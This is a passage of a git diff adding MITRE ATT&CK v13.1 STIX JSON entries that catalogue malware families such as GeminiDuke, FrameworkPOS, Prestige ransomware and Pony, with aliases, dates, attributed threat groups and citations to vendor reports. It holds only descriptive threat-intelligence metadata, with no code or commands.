(Citation: Symantec Sowbug Nov 2017) (Citation: Forcepoint Felismus Mar 2017)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--199463de-d9be-46d6-bb41-07234c1dd5a6.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--199463de-d9be-46d6-bb41-07234c1dd5a6.json new file mode 100644 index 0000000000000000000000000000000000000000..edb1ce9eea5ff08d3d9bc46344b2a199b74c0802 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--199463de-d9be-46d6-bb41-07234c1dd5a6.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b951a858-d51c-4d5d-8c19-7f8afaa387e9", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "GeminiDuke" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--199463de-d9be-46d6-bb41-07234c1dd5a6", + "type": "malware", + "created": "2017-05-31T21:32:36.177Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0049", + "external_id": "S0049" + }, + { + "url": "https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf", + "description": "F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.", + "source_name": "F-Secure The Dukes" + } + ], + "modified": "2020-03-30T16:43:20.186Z", + "name": "GeminiDuke", + "description": "[GeminiDuke](https://attack.mitre.org/software/S0049) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2009 to 2012. (Citation: F-Secure The Dukes)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8.json new file mode 100644 index 0000000000000000000000000000000000000000..ffce858eedfcb92aa61bc670dbd73fe4f984e25b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--b6b2aef6-4153-4d34-a828-4201a65ee3a3", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:24:06.264Z", + "name": "CARROTBAT", + "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "CARROTBAT" + ], + "type": "malware", + "id": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8", + "created": "2020-06-02T14:11:40.581Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0462", + "external_id": "S0462" + }, + { + "source_name": "Unit 42 CARROTBAT November 2018", + "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.", + "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/" + }, + { + "source_name": "Unit 42 CARROTBAT January 2020", + "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. 
Retrieved June 2, 2020.", + "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cc934e4-b01d-4543-a011-b988dfc1a458.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cc934e4-b01d-4543-a011-b988dfc1a458.json new file mode 100644 index 0000000000000000000000000000000000000000..e377664a075a123a0d3574706a765fdf71b68796 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cc934e4-b01d-4543-a011-b988dfc1a458.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--4bd4b784-244a-42a4-aae1-b57f94e8088c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Matryoshka" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1cc934e4-b01d-4543-a011-b988dfc1a458", + "type": "malware", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0167", + "external_id": "S0167" + }, + { + "source_name": "Matryoshka", + "description": "(Citation: ClearSky Wilted Tulip July 2017)" + }, + { + "source_name": "ClearSky Wilted Tulip July 2017", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + }, + { + "source_name": "CopyKittens Nov 2015", + "description": "Minerva Labs LTD and ClearSky Cyber Security. (2015, November 23). CopyKittens Attack Group. Retrieved September 11, 2017.", + "url": "https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf" + } + ], + "modified": "2021-04-23T20:13:32.050Z", + "name": "Matryoshka", + "description": "[Matryoshka](https://attack.mitre.org/software/S0167) is a malware framework used by [CopyKittens](https://attack.mitre.org/groups/G0052) that consists of a dropper, loader, and RAT. It has multiple versions; v1 was seen in the wild from July 2016 until January 2017. v2 has fewer commands and other minor differences. 
(Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cdbbcab-903a-414d-8eb0-439a97343737.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cdbbcab-903a-414d-8eb0-439a97343737.json new file mode 100644 index 0000000000000000000000000000000000000000..5bfe5aba0b9ddba2db550d9d3c566e7c4ade6ab4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1cdbbcab-903a-414d-8eb0-439a97343737.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a8a4ea5a-95ec-4772-b159-4f67894b3320", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_aliases": [ + "FrameworkPOS", + "Trinity" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1cdbbcab-903a-414d-8eb0-439a97343737", + "type": "malware", + "created": "2020-09-08T14:55:46.094Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0503", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0503" + }, + { + "source_name": "Trinity", + "description": "(Citation: SentinelOne FrameworkPOS September 2019)" + }, + { + "source_name": "SentinelOne FrameworkPOS September 2019", + "url": "https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/", + "description": "Kremez, V. (2019, September 19). FIN6 \u201cFrameworkPOS\u201d: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020." + } + ], + "modified": "2020-10-19T19:44:15.357Z", + "name": "FrameworkPOS", + "description": "[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d1fce2f-0db5-402b-9843-4278a0694637.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d1fce2f-0db5-402b-9843-4278a0694637.json new file mode 100644 index 0000000000000000000000000000000000000000..fd70fa2d25d30f963378ca709f2d1995ea57c427 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d1fce2f-0db5-402b-9843-4278a0694637.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--23d0eb7f-2ee0-46fb-a438-229e739f59ca", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "GravityRAT" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1d1fce2f-0db5-402b-9843-4278a0694637", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0237", + "external_id": "S0237" + }, + { + "source_name": "GravityRAT", + "description": "(Citation: Talos GravityRAT)" + }, + { + "source_name": "Talos GravityRAT", + "description": "Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.", + "url": "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + } + ], + "modified": "2020-03-30T20:44:34.524Z", + "name": "GravityRAT", + "description": "[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are \"TheMartian\" and \"The Invincible.\" According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)", + "x_mitre_version": "1.2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d808f62-cf63-4063-9727-ff6132514c22.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d808f62-cf63-4063-9727-ff6132514c22.json new file mode 100644 index 0000000000000000000000000000000000000000..d8e31309f2c8c1fe7eda7328188e7733e63b2aeb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1d808f62-cf63-4063-9727-ff6132514c22.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--e347a1fd-9f00-462b-b218-2f0660114892", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Wes Hurd" + ], + "x_mitre_aliases": [ + "WEBC2" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1d808f62-cf63-4063-9727-ff6132514c22", + "type": "malware", + "created": "2017-05-31T21:33:06.433Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0109", + "external_id": "S0109" + }, + { + "source_name": "WEBC2", + "description": "(Citation: Mandiant APT1)" + }, + { + "source_name": "Mandiant APT1 Appendix", + "description": "Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report-appendix.zip" + }, + { + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "source_name": "Mandiant APT1" + } + ], + "modified": "2020-08-25T21:23:24.223Z", + "name": "WEBC2", + "description": "[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. 
(Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)", + "x_mitre_version": "2.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1da748a5-875d-4212-9222-b4c23ab861be.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1da748a5-875d-4212-9222-b4c23ab861be.json new file mode 100644 index 0000000000000000000000000000000000000000..e87a550a8496e4ff580390475ba8f53f3d85c7e2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1da748a5-875d-4212-9222-b4c23ab861be.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--6250614a-1fe2-4bdc-b225-f9a58a352bbb", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-24T22:25:15.162Z", + "name": "Prestige", + "description": "[Prestige](https://attack.mitre.org/software/S1058) ransomware has been used by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.(Citation: Microsoft Prestige ransomware October 2022)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Mindaugas Gudzis, BT Security" + ], + "x_mitre_aliases": [ + "Prestige" + ], + "type": "malware", + "id": "malware--1da748a5-875d-4212-9222-b4c23ab861be", + "created": "2023-01-20T18:43:05.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1058", + "external_id": "S1058" + }, + { + "source_name": "Microsoft Prestige ransomware October 2022", + "description": "MSTIC. (2022, October 14). New \u201cPrestige\u201d ransomware impacts organizations in Ukraine and Poland. Retrieved January 19, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8.json new file mode 100644 index 0000000000000000000000000000000000000000..740d42019bab199ce397f2dbf2c1893a05d5fbc7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8.json 
@@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--166f235c-a4ee-4f89-a7f6-9e41b50ae07c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "Bankshot", + "Trojan Manuscript" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0239", + "external_id": "S0239" + }, + { + "source_name": "Bankshot", + "description": "(Citation: McAfee Bankshot)" + }, + { + "source_name": "Trojan Manuscript", + "description": "(Citation: McAfee Bankshot)" + }, + { + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/", + "description": "Sherstobitoff, R. (2018, March 08). Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant. Retrieved May 18, 2018.", + "source_name": "McAfee Bankshot" + } + ], + "modified": "2020-03-30T20:41:17.223Z", + "name": "Bankshot", + "description": "[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--20945359-3b39-4542-85ef-08ecb4e1c174.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--20945359-3b39-4542-85ef-08ecb4e1c174.json new file mode 100644 index 0000000000000000000000000000000000000000..e80ae5d0bd342a602e608d6ac0352126d268c525 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--20945359-3b39-4542-85ef-08ecb4e1c174.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--4c36b855-e694-4bf1-8b8a-95629e56ddcf", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "StrongPity" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--20945359-3b39-4542-85ef-08ecb4e1c174", + "type": "malware", + "created": "2020-07-20T17:41:19.690Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0491", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0491" + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020." + }, + { + "source_name": "Talos Promethium June 2020", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020." + } + ], + "modified": "2020-10-15T02:00:29.185Z", + "name": "StrongPity", + "description": "[StrongPity](https://attack.mitre.org/software/S0491) is an information stealing malware used by [PROMETHIUM](https://attack.mitre.org/groups/G0056).(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68.json new file mode 100644 index 0000000000000000000000000000000000000000..d144fdb1c050f8aca279a660cce172d48056f6f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68.json @@ -0,0 +1,44 @@ +{ + "type": "bundle", + "id": "bundle--6c9d6980-3b31-423e-8e17-7a8064c5d4bb", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68", + "type": "malware", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0214", + "external_id": "S0214" + }, + { + "source_name": "HAPPYWORK", + "description": "(Citation: FireEye APT37 Feb 2018)" + }, + { + "source_name": "FireEye APT37 Feb 2018", + "description": "FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.", + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "HAPPYWORK", + "description": "[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b.json new file mode 100644 index 0000000000000000000000000000000000000000..5b0966d0fa44ed0c9879259f0e80c86324677c9e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--49c2b0e6-4a6f-45d1-b9cb-9281c0f14fc1", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "PLAINTEE" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b", + "type": "malware", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0254", + "external_id": "S0254" + }, + { + "source_name": "PLAINTEE", + "description": "(Citation: Rancor Unit42 June 2018)" + }, + { + "source_name": "Rancor Unit42 June 2018", + "description": "Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + } + ], + "modified": "2020-03-30T17:15:33.608Z", + "name": "PLAINTEE", + "description": "[PLAINTEE](https://attack.mitre.org/software/S0254) is a malware sample that has been used by [Rancor](https://attack.mitre.org/groups/G0075) in targeted attacks in Singapore and Cambodia. (Citation: Rancor Unit42 June 2018)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--222ba512-32d9-49ac-aefd-50ce981ce2ce.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--222ba512-32d9-49ac-aefd-50ce981ce2ce.json new file mode 100644 index 0000000000000000000000000000000000000000..410b6860712b907bc2401eccce4aec16626ee3f8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--222ba512-32d9-49ac-aefd-50ce981ce2ce.json 
@@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--96c17320-7a4d-40f9-b3d8-fc070636dde7", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Arie Olshtein, Check Point", + "Kobi Eisenkraft, Check Point" + ], + "x_mitre_aliases": [ + "Pony" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--222ba512-32d9-49ac-aefd-50ce981ce2ce", + "type": "malware", + "created": "2020-05-21T21:03:35.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0453", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0453" + }, + { + "source_name": "Malwarebytes Pony April 2016", + "url": "https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/", + "description": "hasherezade. (2016, April 11). No money, but Pony! From a mail to a trojan horse. Retrieved May 21, 2020." + } + ], + "modified": "2020-06-25T21:57:40.642Z", + "name": "Pony", + "description": "[Pony](https://attack.mitre.org/software/S0453) is a credential stealing malware, though has also been used among adversaries for its downloader capabilities. The source code for Pony Loader 1.0 and 2.0 were leaked online, leading to their use by various threat actors.(Citation: Malwarebytes Pony April 2016)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22addc7b-b39f-483d-979a-1b35147da5de.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22addc7b-b39f-483d-979a-1b35147da5de.json new file mode 100644 index 0000000000000000000000000000000000000000..e2963117c3ed075326d55740e4a7a8b694ba0ebc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--22addc7b-b39f-483d-979a-1b35147da5de.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4fae13c1-fab3-4789-bb32-62c677dfbd9f", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "WinMM" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "malware--22addc7b-b39f-483d-979a-1b35147da5de", + "type": "malware", + "created": "2017-05-31T21:32:40.004Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0059", + "url": "https://attack.mitre.org/software/S0059", + "source_name": "mitre-attack" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "modified": "2020-03-30T18:27:57.226Z", + "name": "WinMM", + "description": "[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
